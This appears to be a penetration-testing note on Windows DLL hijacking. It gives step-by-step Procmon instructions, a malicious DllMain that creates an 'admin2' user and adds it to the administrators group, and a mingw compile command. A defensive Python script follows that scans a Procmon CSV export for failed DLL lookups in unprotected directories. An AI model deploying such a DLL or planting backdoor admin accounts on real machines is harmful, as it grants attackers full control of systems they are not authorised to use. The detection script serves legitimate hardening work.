- Download a program that runs with higher privileges into a VM of its own.
- Use Procmon (download it from Microsoft) to find DLLs the program tries to load but cannot find.
- Filter for the service or executable, then restart it.
- Go through the list and look for DLL loads that fail because the file is not there, or that resolve to a file which could be overwritten.
- Optionally, also filter for Operation = CreateFile.
- If you found a place where you can create or overwrite a DLL, create one. Starting from this template from Microsoft, a variant could be:
#include <stdlib.h>
#include <windows.h>

/* Entry point the loader calls. The signature matches the declaration in
   windows.h and is given C linkage so it is still found when the file is
   compiled as C++ (searchedName.cpp). */
#ifdef __cplusplus
extern "C"
#endif
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,   // Handle to DLL module
    DWORD fdwReason,      // Reason for calling function
    LPVOID lpvReserved )  // Reserved
{
    switch ( fdwReason )
    {
    case DLL_PROCESS_ATTACH: { // A process is loading the DLL.
        // Braces give the declaration its own scope; a declaration directly
        // after a case label does not compile as C.
        int i;
        i = system ("net user admin2 password123! /add");
        i = system ("net localgroup administrators admin2 /add");
        (void)i;
        break;
    }
    case DLL_THREAD_ATTACH:  // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:  // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}
Compile it, natively or with a cross-compiler:
x86_64-w64-mingw32-gcc searchedName.cpp --shared -o searchedName.dll
Restart the service or application somehow and check whether a new user admin2 exists.
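The Procmon filtering from the earlier steps, run over a saved Procmon CSV export so every failed DLL lookup can be fixed before anyone else finds it (ship the DLL, shorten the search path, or tighten the directory ACL). This is an added example, not part of the original note; the CSV rows are constructed, and the list of protected directories is an assumption about default Windows ACLs.

```python
import csv
import io
from collections import defaultdict

# Directories that only administrators can write to by default (assumption). A
# failed DLL lookup in one of these is low risk; anywhere else needs an ACL review.
PROTECTED_PREFIXES = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\windows\winsxs",
    r"c:\program files",
)

def find_phantom_dlls(procmon_csv):
    """Map process -> dll name -> [(directory, protected)] for every CreateFile
    on a .dll that ended in NAME NOT FOUND, i.e. a DLL searched for but absent."""
    hits = defaultdict(lambda: defaultdict(list))
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue
        directory, _, name = path.rpartition("\\")
        protected = directory.lower().startswith(PROTECTED_PREFIXES)
        hits[row["Process Name"]][name.lower()].append((directory, protected))
    return hits

def unprotected_lookups(hits):
    """(process, dll, directory) triples where the searched directory is not protected."""
    return sorted((proc, dll, d) for proc, dlls in hits.items()
                  for dll, dirs in dlls.items() for d, prot in dirs if not prot)

# Constructed sample in Procmon's "Save as CSV" column layout (not a real capture).
SAMPLE = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.001","svc.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read"
"10:00:01.002","svc.exe","1234","CreateFile","C:\Windows\System32\vendorhelper.dll","NAME NOT FOUND","Desired Access: Read"
"10:00:01.003","svc.exe","1234","CreateFile","C:\Program Files\Vendor\vendorhelper.dll","NAME NOT FOUND","Desired Access: Read"
"10:00:01.004","svc.exe","1234","CreateFile","C:\Vendor\Tools\vendorhelper.dll","NAME NOT FOUND","Desired Access: Read"
"10:00:01.005","svc.exe","1234","CreateFile","C:\Vendor\Tools\settings.ini","NAME NOT FOUND","Desired Access: Read"
"10:00:01.006","explorer.exe","777","RegOpenKey","HKLM\Software\Vendor","NAME NOT FOUND","Desired Access: Read"
'''

if __name__ == "__main__":
    for proc, dll, directory in unprotected_lookups(find_phantom_dlls(SAMPLE)):
        print(f"{proc} searched {directory} for {dll}: check who can write there")
```

Only the lookup outside the protected directories is reported; the two searches under C:\Windows and C:\Program Files are kept in the map for reference but need no ACL change.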